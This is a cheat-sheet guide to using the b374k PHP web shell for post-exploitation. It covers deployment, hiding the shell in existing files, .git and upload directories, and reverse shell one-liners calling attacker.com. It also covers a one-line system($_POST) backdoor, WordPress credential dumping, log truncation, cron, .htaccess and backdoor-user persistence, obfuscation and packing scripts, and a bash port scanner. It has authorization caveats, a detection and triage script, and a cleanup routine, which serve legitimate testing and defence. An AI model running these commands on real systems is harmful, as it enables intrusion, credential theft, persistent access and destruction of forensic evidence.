Overview
b374k is a single-file PHP web shell used in penetration testing and post-exploitation. Once the file is executing on a web server it provides a file manager, a command (terminal) tab, a PHP eval tab, database clients, process and system information, and helpers for bind and reverse shells. The distributed file is packed (compressed and base64-encoded inside a small eval() loader), which keeps it small and hides its strings from naive grep-based scanning. Everything is driven through the browser; there is no separate command-line client, so "maintaining access" means keeping that one PHP file reachable.
Understanding b374k
What is b374k?
b374k is a single-file PHP application that provides:
- Web-based file manager and editor (browse, upload, download, edit, chmod)
- Command execution (terminal tab) and PHP code evaluation (eval tab), plus bind and reverse shell helpers
- Database client (MySQL and the other DBMS drivers available to the PHP build)
- Network helpers (back-connect / reverse shell, bind shell)
- PHP and server information gathering (phpinfo, loaded extensions, disable_functions)
- Log file viewing and editing through the file manager
- Process listing and system information collection
Legal Notice
Use b374k only in authorized penetration tests and lawful security assessments, within a written scope that explicitly permits placing a web shell on the target. Unauthorized access to computer systems is illegal. Obtain written authorization before using it in any context, and record every file, account and cron entry you create so it can be removed afterwards.
Installation and Setup
Obtaining b374k
# Clone the project repository
git clone https://github.com/b374k/b374k b374k-shell
cd b374k-shell
# The repository ships the unpacked source (index.php plus modules); the single
# deployable file is produced by the packer. Set the password here (it is stored
# in the output as a SHA1 hash). Check the README for the current option list.
php -f index.php -- -o shell.php -p 'StrongPassword' -s -b -z gzcompress -c 9
# Only for authorized penetration testing. Do not use pre-packed copies found
# on forums or mirrors: third-party builds of popular web shells are frequently
# backdoored to call home to whoever repackaged them.
Deploying to Web Server
# In a real engagement the file normally arrives through the weakness under
# test (unrestricted upload, LFI to a log, RCE). With existing SSH access:
scp shell.php user@target.com:/var/www/html/admin/
# From a shell already obtained on the server
cp shell.php /var/www/html/
# Or append to an existing PHP file. The file must still parse afterwards: if
# it ends with ?>, the appended <?php block is picked up normally
cat shell.php >> legitimate_file.php
File Naming
# Pick a filename that matches its surroundings rather than a generic one
cp shell.php error.php
cp shell.php upload.php
# Do not overwrite index.php: it breaks the site and is noticed immediately
# Dot-directories are a common hiding place, but many hardened Apache and
# Nginx configurations deny requests to .git/ and .svn/ outright, so verify
# that the URL actually serves before relying on it
mkdir -p /var/www/html/.git/
cp shell.php /var/www/html/.git/shell.php
# In an authorized test, record every path you create for later cleanup
Web Interface Access
Basic Access
# Access through browser; b374k shows its own login form
http://target.com/shell.php
# If the directory itself sits behind HTTP basic auth, those credentials go in
# the URL (that is the web server's authentication, not b374k's)
http://username:password@target.com/shell.php
# Route the browser or curl through an interception proxy so every request
# made during the engagement is recorded
curl -x http://127.0.0.1:8080 http://target.com/shell.php
Authentication Setup
# b374k requires a password; it is stored in the packed file as a SHA1 hash
# The project README documents the default password as: b374k
# Set your own password when packing (-p option) rather than editing the
# packed file. A shell left with the default password is usable by anyone who
# finds it, including real attackers, which is the main reason a forgotten
# test shell is a finding in its own right
php -f index.php -- -o shell.php -p 'StrongPassword'
File Management
Browsing Files and Directories
| Feature | Description |
|---|---|
| File listing | View directory contents with owner, permissions and timestamps |
| File preview | View text files in the web interface |
| Download | Download files from the server to the attacker machine |
| Upload | Upload files to the server |
| Edit | Edit text files inline |
| Delete | Remove files from the system |
| Rename | Rename files and directories |
| Permissions | Change file permissions (chmod) |
File Operations
# Download sensitive files through interface
# Click file → Download
# Edit PHP files
# Click file → Edit → Modify code → Save
# Create new files
# New File button → Enter filename → Write content
# Delete logs
# Click access_log → Delete
# Change permissions on script
# Click script.php → Permissions → 755 → Apply
Uploading Backdoors
# Upload additional PHP shells
# Upload button → Select file → Upload
# Upload compiled binaries
# Upload button → netcat binary → Upload to /tmp/
# Upload multiple files at once
# Select multiple files → Batch upload
Command Execution
Basic Command Execution
| Command | Purpose |
|---|---|
| id | Get current user and group information |
| whoami | Display current user |
| pwd | Show current working directory |
| ls -la | List files with detailed permissions |
| uname -a | Display kernel and system information |
| netstat -tulnp (or ss -tulnp) | Show listening ports and the owning processes |
| ps aux | List all running processes |
Command Execution Examples
# Through the web interface terminal tab
# Enter: cat /etc/passwd
# Execute
# Through the eval tab, which runs PHP directly. Useful when one execution
# primitive is in disable_functions but another is not
system("id");
echo shell_exec("id");
# Chained commands
cat /etc/hosts && whoami && pwd
# Pipe output to tools (sudoers is normally readable only by root)
cat /etc/sudoers 2>/dev/null | grep NOPASSWD
# Commands run as the web server user (www-data, apache, nginx) in a
# non-interactive shell with no TTY: sudo, su and editors will not prompt
Privilege Escalation Checks
# Check sudo privileges
sudo -l
# Find SUID binaries
find / -perm -4000 2>/dev/null
# Check kernel version
uname -a
# Look for writable files outside the scratch directories (everything under
# /tmp is writable by design, so searching there proves nothing)
find / -path /proc -prune -o -type f -writable -print 2>/dev/null | grep -vE '^/(tmp|dev|run)/'
# Writable configuration or scripts that root runs (cron, init) are the hits worth chasing
find /etc /opt /usr/local -type f -writable 2>/dev/null
Reverse Shell Integration
Reverse Shell Execution
# Bash reverse shell. /dev/tcp is a bash feature and the terminal tab often
# runs commands through /bin/sh, so invoke bash explicitly
bash -c 'bash -i >& /dev/tcp/attacker.com/4444 0>&1'
# Python reverse shell (use python or python3, whichever the host has)
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
# Netcat reverse shell (-e exists only in netcat-traditional and ncat)
nc attacker.com 4444 -e /bin/bash
# OpenBSD netcat has no -e; use a named pipe instead
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc attacker.com 4444 > /tmp/f
# Launch the one-liner in the background (nohup ... &) so the HTTP request that
# started it returns; otherwise the request hangs until the shell exits
Listener Setup
# On attacker machine
nc -nlvp 4444
# Using socat for a full TTY. This listener expects a socat client on the
# target, e.g. socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:attacker.com:4444
socat file:`tty`,raw,echo=0 TCP-LISTEN:4444
# Using the Metasploit handler. The payload must match what calls back: the
# bash one-liner above is a plain Unix command shell, not a Windows meterpreter
use exploit/multi/handler
set PAYLOAD cmd/unix/reverse_bash
set LHOST attacker.com
set LPORT 4444
exploit
Database Client Functions
Connecting to Databases
# MySQL connection. Take the credentials from the application's own config
# (wp-config.php, .env, config.php) via the file manager instead of guessing;
# the database is frequently reachable only from localhost, which is exactly
# where the shell runs
Host: localhost
User: root
Password: rootpass
Port: 3306
Database: wordpress
# Click Connect button in web interface
Database Operations
| Operation | Description |
|---|---|
| List databases | View all available databases |
| Select database | Choose database to query |
| List tables | View tables in database |
| Execute query | Run arbitrary SQL queries |
| Export data | Dump database contents |
| Modify data | Insert/update/delete records |
Direct Queries and Data Extraction (this is direct querying with the application's own credentials, not SQL injection)
-- List all databases
SHOW DATABASES;
-- Select database
USE wordpress;
-- List tables
SHOW TABLES;
-- Dump user credentials
SELECT user_login, user_pass FROM wp_users;
-- Extract email addresses
SELECT user_email FROM wp_users;
-- Modify admin password. WordPress accepts a plain MD5 value in user_pass and
-- rehashes it on the next login. This is destructive: in an authorized test,
-- read and keep the original user_pass value first so it can be restored
UPDATE wp_users SET user_pass=MD5('newpassword') WHERE ID=1;
Network Utilities
Port Scanning
# Whether a scanner is available depends on the b374k version and on what is
# installed on the host (nmap, nc -z); the portable fallback is a bash
# /dev/tcp loop from the terminal tab
Host: 192.168.1.1
Port range: 1-65535
Type: TCP/UDP
# Start with the common ports; a full 65535-port sweep from a web shell is slow
# and very noisy in the target's logs
80, 443, 22, 21, 3306, 5432, 8080, 8888
Network Enumeration
# Get network interfaces
ifconfig / ip addr
# Get routing table
route / ip route
# DNS lookup
nslookup domain.com
host domain.com
# Traceroute
traceroute example.com
PHP Information Gathering
| Source | Information |
|---|---|
| phpinfo() | Complete PHP configuration (b374k's info tab, or the eval tab) |
| php -v | PHP version of the CLI binary (may differ from the web SAPI) |
| extension_loaded() | Check whether a specific extension is present |
| php.ini | The PHP configuration file (its path is shown by phpinfo) |
| disable_functions | Execution primitives the administrator has disabled |
Checking Capabilities
# php -r reads the CLI php.ini, which is often a different file from the one
# the web SAPI uses; for the values that matter to the shell, paste the PHP
# inside the quotes into the eval tab instead
# Check which execution functions are disabled
php -r 'echo ini_get("disable_functions");'
# List loaded extensions
php -r 'print_r(get_loaded_extensions());'
# safe_mode was removed in PHP 5.4; on any current version this prints nothing
php -r 'echo ini_get("safe_mode");'
# Get memory limit
php -r 'echo ini_get("memory_limit");'
Log Manipulation and Cover
Viewing Logs
# Apache access log
/var/log/apache2/access.log
/var/log/httpd/access_log
# Apache error log
/var/log/apache2/error.log
/var/log/httpd/error_log
# PHP error log (distribution-dependent; the error_log value in phpinfo() is
# authoritative, and by default PHP errors go to the web server's error log)
/var/log/php-fpm.log
/var/log/php.log
# System authentication log
/var/log/auth.log
/var/log/secure
Log Clearing Commands
# Log tampering is normally outside the scope of an authorized test and
# destroys evidence the client's responders need; do it only when the rules of
# engagement explicitly cover it. All of these need write access to the log
# (root, or membership of the log's group)
# Truncate Apache access logs (echo "" > file leaves a blank line; : > does not)
: > /var/log/apache2/access.log
# Truncate auth logs (if root)
: > /var/log/auth.log
# Truncate the PHP error log
: > /var/log/php.log
# Truncate syslog
truncate -s 0 /var/log/syslog
# Truncation is itself an indicator: a log that drops to zero bytes trips any
# file-integrity or log-shipping setup, and entries already forwarded to a
# central collector cannot be removed this way
Customization and Obfuscation
Modifying Source Code
The packed shell is a single eval() loader and is not meant to be edited by hand; change the unpacked source in the repository and re-run the packer. The password is a packer option, not a top-level variable in shell.php, and it is held in the output as a SHA1 hash.
// Set the password at pack time instead of editing the packed file
php -f index.php -- -o shell.php -p 'ComplexPassword123!' -s -b -z gzcompress -c 9
// Removing execution primitives you do not need is done in the unpacked
// source before packing; a smaller shell is less useful to anyone else who
// finds it during the engagement
Obfuscation Techniques
# The packer already does the usual transformations: strip comments and
# whitespace (-s), base64-encode (-b) and compress (-z gzcompress, -c 9). The
# result is a loader of the form
<?php eval(gzuncompress(base64_decode("...")));
# By hand: base64 alone produces a text file, not runnable PHP, so the data has
# to be wrapped in a decode-and-eval loader like the one above
base64 -w0 shell.php > shell.b64
# php_strip_whitespace() returns the source minus comments and whitespace
php -r 'echo php_strip_whitespace("shell.php");' > shell.min.php
# Superglobals cannot be renamed ($_POST is $_POST); renaming your own
# variables and splitting strings defeats only the simplest signature matches
"system" -> "sys"."tem"
# None of this hides the loader itself: eval(...(base64_decode( is the first
# thing web-shell scanners look for
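The packing step and its limit, as an added example. This is not b374k's own packer (that lives in the project repository); it reproduces the idea with gzip and base64, recovers the source from the result the way a responder would, and shows which string a scanner can still match. It assumes PHP's gzdecode() (PHP 5.4 and later) on the target, whose input is what gzip produces; the sample shell is a constructed stand-in for the real source.

```shell
#!/usr/bin/env bash
# Added example (not b374k's packer): compress + base64 a PHP source into a
# self-decoding eval() loader, unpack it again, and match the loader signature.
set -u

# pack_php SRC DST: write a loader that decompresses and eval()s SRC at runtime.
pack_php() {
  local src=$1 dst=$2 body blob
  body=$(sed '1s/^<?php//' "$src")           # eval() takes code, not a file: drop the open tag
  blob=$(printf '%s\n' "$body" | gzip -9 -n | base64 | tr -d '\n')   # -n: no timestamp, stable output
  printf '<?php eval(gzdecode(base64_decode("%s"))); ?>\n' "$blob" > "$dst"
}

# unpack_php LOADER: print the PHP code hidden inside a loader produced above.
# Responders do exactly this to a found file before deciding what it is.
unpack_php() {
  sed -n 's/.*base64_decode("\([^"]*\)").*/\1/p' "$1" | base64 -d | gzip -dc
}

# loader_signature FILE: exit 0 if the decode-then-eval chain is present.
# Compression hides every string in the shell body; it cannot hide this line.
loader_signature() {
  grep -qE 'eval\((gzdecode|gzinflate|gzuncompress|str_rot13)?\(?base64_decode\(' "$1"
}

# Constructed stand-in for the real source, so the block runs without the repo.
write_sample_shell() {
  cat > "$1" <<'EOF'
<?php
// b374k-style command tab: run whatever arrives in the cmd POST parameter
if (isset($_POST['cmd'])) { system($_POST['cmd']); }
EOF
}

# demo: pack the sample, then check what is and is not visible in the result.
demo() {
  local work; work=$(mktemp -d)
  write_sample_shell "$work/shell.php"
  pack_php "$work/shell.php" "$work/packed.php"
  grep -q 'b374k' "$work/packed.php" && echo "marker visible" || echo "marker hidden in packed file"
  loader_signature "$work/packed.php" && echo "loader signature still matches"
  unpack_php "$work/packed.php" | grep -q 'system(' && echo "source recovered from loader"
  rm -rf "$work"
}
```

Run demo from a bash prompt; the three lines it prints are the whole point: the identifying strings disappear from the packed file, the loader line does not, and unpacking is a one-liner once the loader is found.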
Persistence Techniques
Creating Backdoors
# Re-create the shell every minute from a copy kept elsewhere (example paths),
# so deleting the web-root file alone does not remove access. Running
# php /tmp/shell.php from cron achieves nothing: the shell is a web UI, not a script
(crontab -l 2>/dev/null; echo "* * * * * cp /tmp/.cache/s.php /var/www/html/error.php") | crontab -
# Redirect requests to the shell via .htaccess in the web root (not under
# /etc/apache2: .htaccess is per-directory and needs AllowOverride). This rule
# rewrites every request, so the site stops working; a narrower pattern is less visible
echo "RewriteRule ^(.*)$ /shell.php [L]" >> /var/www/html/.htaccess
# Hide in image files. Single quotes matter: in double quotes the shell expands
# $_POST to an empty string and the payload is silently mangled. The image only
# executes if a handler rule or an include path treats it as PHP
echo '<?php system($_POST["cmd"]); ?>' >> image.jpg
Alternative Access Points
# Hidden .htaccess shell: make Apache run the "image" as PHP (needs
# AllowOverride FileInfo and a mod_php setup; with php-fpm the handler differs)
<FilesMatch "image\.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
# Hidden PHP files in directories that already contain plenty of files
.git/shell.php
.svn/shell.php
uploads/shell.php
wp-content/plugins/shell.php
# Well-configured servers deny PHP execution under uploads/ and refuse dot
# directories entirely; test each location before relying on it
Post-Exploitation Workflows
# 1. Check current user and permissions
whoami && id
# 2. Enumerate system
uname -a && cat /etc/os-release
# 3. Find sensitive files
find /home -name "*.txt" -o -name "*.sql" 2>/dev/null
# 4. Check database access. mysql -p prompts interactively and hangs inside a
#    web shell; pass the password inline, taken from the application config
mysql -u root -p'rootpass' -e "SHOW DATABASES;"
Lateral Movement
# 1. Find SSH material (private keys, known_hosts for hostnames, authorized_keys)
find / \( -name "id_rsa" -o -name "id_ed25519" -o -name "authorized_keys" -o -name "known_hosts" \) 2>/dev/null
# 2. Check listening services and established connections to other hosts
netstat -tulnp
netstat -antp | grep ESTABLISHED
# 3. Scan internal network. nmap is rarely present on a web server; a bash
#    /dev/tcp loop from the terminal tab works anywhere bash does
nmap -sn 192.168.1.0/24
# 4. Check the ARP cache and hosts file for neighbours
arp -a; ip neigh
cat /etc/hosts
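The bash-only fallback mentioned under Port Scanning, Network Enumeration and Lateral Movement, as an added example: host discovery and port probing with nothing but bash builtins, for the common case where neither nmap nor nc is installed on the web server. This is not b374k code. It assumes a bash built with /dev/tcp support and the coreutils timeout command; the addresses in the usage comment are placeholders.

```shell
#!/usr/bin/env bash
# Added example (not b374k code): CIDR expansion and TCP probing from bash.

# ip_to_int A.B.C.D -> 32-bit integer; int_to_ip does the reverse.
ip_to_int() {
  local IFS=.
  set -- $1
  echo $(( ($1 << 24) | ($2 << 16) | ($3 << 8) | $4 ))
}
int_to_ip() {
  echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# expand_cidr NET/BITS: print every usable host address (network and broadcast
# excluded), one per line, for any prefix length 1..30. The host part of NET
# is ignored, so 10.1.2.77/24 and 10.1.2.0/24 give the same list.
expand_cidr() {
  local net=${1%/*} bits=${1#*/} mask start end i
  mask=$(( (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF ))
  start=$(( $(ip_to_int "$net") & mask ))
  end=$(( start | (~mask & 0xFFFFFFFF) ))
  for (( i = start + 1; i < end; i++ )); do
    int_to_ip "$i"
  done
}

# probe_tcp HOST PORT [SECONDS]: exit 0 when a TCP handshake completes.
# Opening /dev/tcp/HOST/PORT does the connect; timeout bounds the wait for
# filtered ports that never answer (a closed port fails immediately).
probe_tcp() {
  local host=$1 port=$2 secs=${3:-2}
  timeout "$secs" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
}

# scan_ports HOST PORT...: print the ports that accepted a connection.
scan_ports() {
  local host=$1 port; shift
  for port in "$@"; do
    probe_tcp "$host" "$port" && echo "$port"
  done
  return 0
}

# sweep_cidr NET/BITS PORT: print hosts in the range that answer on PORT.
# Probing a service port (22, 80, 445) is more dependable than ICMP from a
# web server, where ping is often missing or not permitted for www-data.
sweep_cidr() {
  local port=$2 host
  while IFS= read -r host; do
    probe_tcp "$host" "$port" 1 && echo "$host"
  done < <(expand_cidr "$1")
  return 0
}

# Usage from the terminal tab (placeholder addresses):
#   sweep_cidr 192.168.1.0/24 22
#   scan_ports 192.168.1.10 21 22 80 443 3306 5432 8080 8888
```

A /24 sweep at one second per host takes a few minutes from a single loop; it is sequential by design, because a burst of parallel connects from the web server is what an IDS flags first.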
Persistence Establishment
# Creating accounts and keys on a client system is a heavy footprint: get it
# into the rules of engagement first, and record every change for cleanup
# 1. Create system user (requires root)
useradd -m -s /bin/bash backdoor
# 2. Add SSH key. sshd (StrictModes) rejects keys with wrong owner or mode
mkdir -p /home/backdoor/.ssh/
echo "ssh-rsa AAAA..." > /home/backdoor/.ssh/authorized_keys
chown -R backdoor:backdoor /home/backdoor/.ssh
chmod 700 /home/backdoor/.ssh; chmod 600 /home/backdoor/.ssh/authorized_keys
# 3. Add cron job (installs under the current user, usually www-data)
(crontab -l 2>/dev/null; echo "*/5 * * * * /tmp/agent.sh") | crontab -
# 4. Verify persistence (~ is the current user, not backdoor)
crontab -l && cat /home/backdoor/.ssh/authorized_keys
Security Detection and Evasion
Detection Methods
# Look for b374k signatures. The packed file does not contain "b374k" in clear
# text, so also match the loader and raw execution primitives
grep -r "b374k" /var/www/
grep -rlE 'eval\((gzinflate|gzuncompress|gzdecode|base64_decode)\(' /var/www/ --include='*.php'
grep -rlE '(system|passthru|shell_exec|exec)\(\$_(POST|GET|REQUEST)' /var/www/ --include='*.php'
# Check for recently modified PHP files, and PHP files where none belong
find /var/www -name "*.php" -mtime -1
find /var/www -path '*/uploads/*' -name '*.php'
# Monitor web server logs: a web shell shows up as repeated POSTs from one
# client to one PHP file, usually with no referer
tail -f /var/log/apache2/access.log | grep POST
# Check the process list for shells spawned by the web server user
ps -eo user,pid,ppid,cmd | grep -E '^(www-data|apache|nginx)' | grep -vE 'apache2|httpd|php-fpm|nginx'
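The detection commands above, put together as an added example a responder can run on a suspected host. This is not part of b374k or of the original page. Assumptions: PHP files live under the web root passed as the first argument, the access log is in Apache/Nginx combined format, and the sample tree and log lines are constructed for the example, not captured from a real incident. The signatures are the generic ones discussed above, not a complete ruleset.

```shell
#!/usr/bin/env bash
# Added example (not b374k code): file-based and log-based web-shell triage.

# find_webshell_candidates WEBROOT: print "reason<TAB>path" for every PHP file
# containing one of three constructs. Order matters: a packed loader is
# reported as such even if it also contains raw primitives.
find_webshell_candidates() {
  local root=$1 f
  find "$root" -type f \( -name '*.php' -o -name '*.phtml' -o -name '*.phar' \) -print0 |
  while IFS= read -r -d '' f; do
    if grep -qE 'eval[[:space:]]*\([[:space:]]*(gzinflate|gzuncompress|gzdecode|str_rot13|base64_decode)[[:space:]]*\(' "$f"; then
      printf 'packed-loader\t%s\n' "$f"        # decode-then-eval, as produced by a packer
    elif grep -qE '(system|exec|shell_exec|passthru|popen|proc_open)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)' "$f"; then
      printf 'exec-from-request\t%s\n' "$f"    # request parameter straight into a command
    elif grep -qE '(eval|assert|create_function)[[:space:]]*\([[:space:]]*\$_(GET|POST|REQUEST|COOKIE)' "$f"; then
      printf 'eval-from-request\t%s\n' "$f"    # request parameter evaluated as PHP
    fi
  done
}

# php_under_upload_dirs WEBROOT: PHP files in directories that should hold only
# static content. No such file is legitimate.
php_under_upload_dirs() {
  find "$1" -type f -name '*.php' \( -path '*/uploads/*' -o -path '*/.git/*' -o -path '*/.svn/*' -o -path '*/images/*' \)
}

# flag_php_posts ACCESS_LOG [MIN]: print "count ip path" for PHP paths that got
# at least MIN POST requests from one client, busiest first. Driving b374k is
# a stream of POSTs from one address to one file; a real form handler sees
# many clients with few POSTs each.
flag_php_posts() {
  local min=${2:-2}
  awk -v min="$min" '
    $6 == "\"POST" && $7 ~ /\.php/ { n[$1 " " $7]++ }
    END { for (k in n) if (n[k] >= min) print n[k], k }
  ' "$1" | sort -rn
}

# make_sample DIR: constructed web root and access log (not a real capture).
make_sample() {
  local d=$1
  mkdir -p "$d/www/wp-content/uploads/2024/10"
  printf '<?php eval(gzuncompress(base64_decode("eJw="))); ?>\n' > "$d/www/wp-content/uploads/2024/10/error.php"
  printf '<?php if (isset($_POST["cmd"])) { system($_POST["cmd"]); } ?>\n' > "$d/www/wp-content/uploads/2024/10/img.php"
  printf '<?php echo htmlspecialchars($_GET["q"] ?? ""); ?>\n' > "$d/www/index.php"
  cat > "$d/access.log" <<'EOF'
198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2024:13:55:40 +0000] "GET /wp-content/uploads/2024/10/error.php HTTP/1.1" 200 2211 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2024:13:55:44 +0000] "POST /wp-content/uploads/2024/10/error.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2024:13:56:01 +0000] "POST /wp-content/uploads/2024/10/error.php HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2024:13:57:12 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2024:13:57:20 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
EOF
}

# Usage: d=$(mktemp -d); make_sample "$d"
#        find_webshell_candidates "$d/www"; php_under_upload_dirs "$d/www"; flag_php_posts "$d/access.log"
```

On the constructed data the file scan names the two uploads (one as a packed loader, one as exec-from-request) and leaves index.php alone, and the log check surfaces the single client hammering error.php while the legitimate wp-login.php POST falls below the threshold. Raise the threshold on busy sites, and cross-reference hits with the file scan: a POST target that also appears under uploads/ is the shell.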
Evasion Techniques
# Non-standard ports do not help: the shell is reached through whatever port
# the web server already serves, and that traffic is what gets logged
# Blend the filename into its surroundings
mv shell.php assets_loader.php
# Hide in legitimate directories
cp shell.php /var/www/html/wp-admin/temp.php
# URL-encoding a command applies to minimal one-liner shells that take ?cmd=;
# b374k sends its commands in POST bodies, which access logs do not record
http://target.com/shell.php?cmd=id%20%26%26%20cat%20/etc/passwd
# Use HTTPS where the site offers it so POST bodies are not visible to network
# monitoring; the file on disk remains the primary detection point regardless
Troubleshooting
Common Issues
| Issue | Solution |
|---|---|
| 404 File Not Found | Verify upload location and filename |
| Permission Denied | Check file permissions (must be readable by the web server user) |
| Functions Disabled | Check the php.ini disable_functions setting; try another primitive from the eval tab |
| Database Connection Failed | Verify credentials and network access |
| Authentication Failed | Use the password set at pack time (default per README: b374k) |
Debugging
# Check PHP errors (path varies; see error_log in phpinfo())
tail -f /var/log/php-fpm.log
# Test PHP execution (CLI only; does not prove the web SAPI is working)
php -r 'echo "PHP works";'
# Verify web server access: a working shell returns its login page; a missing
# PHP handler returns the raw source, which also leaks the password hash
curl -s http://target.com/shell.php | head
# Check disable_functions from the info tab, or from the eval tab:
echo ini_get("disable_functions");
Best Practices for Authorized Testing
Documentation
# Record all access timestamps
# Log all commands executed
# Document findings and data accessed
# Maintain audit trail of activities
Cleanup
# Remove the shell file, and every copy, cron entry and .htaccess rule recorded during the test
rm /var/www/html/shell.php
# Do not clear logs: the client's responders need them to confirm what was and was not touched
# Restore original file permissions
# Remove added user accounts
# Delete cron jobs
Reporting
Document:
- How shell was deployed
- Access methods used
- Commands executed
- Data accessed
- Recommendations for remediation
- Timeline of activities
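The documentation, cleanup and reporting steps above depend on one thing: an exact record of what was placed on the target. As an added example, not part of b374k or the original page, here is a manifest kept during the test and the cleanup that replays it in reverse and verifies the result. The manifest format, the artifact types and the paths in the usage comment are assumptions made for this example.

```shell
#!/usr/bin/env bash
# Added example (not b374k code): artifact manifest, reverse-order cleanup,
# and a verification pass whose output goes straight into the report.
#
# Manifest line: <utc-timestamp>\t<type>\t<target>\t<detail>
#   file  PATH        a file we created (removed with rm -f)
#   dir   PATH        a directory we created (removed only if empty)
#   line  PATH TEXT   a line we appended to an existing file (authorized_keys,
#                     .htaccess, crontab dump); only that exact line is removed
#   user  NAME        an account we created (userdel -r, needs root)

# record_artifact MANIFEST TYPE TARGET [DETAIL]: append one entry.
record_artifact() {
  local manifest=$1 type=$2 target=$3 detail=${4:-}
  printf '%s\t%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$type" "$target" "$detail" >> "$manifest"
}

# remove_line FILE TEXT: drop exactly that line and nothing else. -F and -x
# make the match literal and whole-line, so key material is never a regex.
remove_line() {
  local file=$1 text=$2 tmp
  [ -f "$file" ] || return 0
  tmp=$(mktemp)
  grep -vxF -- "$text" "$file" > "$tmp" || true   # grep exits 1 when nothing is left
  cat "$tmp" > "$file"                             # keep the original inode, owner and mode
  rm -f "$tmp"
}

# cleanup_from_manifest MANIFEST: undo each entry newest-first, so a line
# appended to a file is removed before the file's directory is considered.
cleanup_from_manifest() {
  local ts type target detail
  sed -n '1!G;h;$p' "$1" | while IFS=$'\t' read -r ts type target detail; do
    case $type in
      file) rm -f -- "$target" ;;
      dir)  rmdir -- "$target" 2>/dev/null || true ;;
      line) remove_line "$target" "$detail" ;;
      user) userdel -r "$target" 2>/dev/null || true ;;
    esac
  done
}

# verify_cleanup MANIFEST: exit 0 only if no recorded artifact remains, and
# print whatever is still present.
verify_cleanup() {
  local ts type target detail rc=0
  while IFS=$'\t' read -r ts type target detail; do
    case $type in
      file|dir) [ -e "$target" ] && { echo "still present: $target"; rc=1; } ;;
      line) [ -f "$target" ] && grep -qxF -- "$detail" "$target" && { echo "line still in $target: $detail"; rc=1; } ;;
      user) id "$target" >/dev/null 2>&1 && { echo "user still exists: $target"; rc=1; } ;;
    esac
  done < "$1"
  return $rc
}

# Usage during the test (placeholder paths):
#   record_artifact /root/engagement.tsv file /var/www/html/error.php
#   record_artifact /root/engagement.tsv line /home/backdoor/.ssh/authorized_keys 'ssh-ed25519 AAAA... pentest'
# At the end:
#   cleanup_from_manifest /root/engagement.tsv && verify_cleanup /root/engagement.tsv
```

Keep the manifest off the target (copy it back to the attacker machine after every change); if the host is rebuilt or the shell is found and removed by the client mid-test, the manifest is still the list of what the report has to account for.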
Alternatives and Comparisons
| Tool | Comparison |
|---|---|
| Weevely | Python-generated PHP agent driven from a terminal client; smaller and more obfuscated on disk |
| JSP Shells | Java-based, for Java application servers |
| ASP.NET Shells | Windows-focused, requires the .NET framework |
| Reverse Shell Scripts | Simpler but less feature-rich |
References and Further Learning
- Original repository documentation (https://github.com/b374k/b374k)
- OWASP Web Security Testing Guide
- Penetration Testing Execution Standard (PTES)
- CWE-94: Improper Control of Generation of Code ('Code Injection')
- MITRE ATT&CK: T1190 Exploit Public-Facing Application
- MITRE ATT&CK: T1505.003 Server Software Component: Web Shell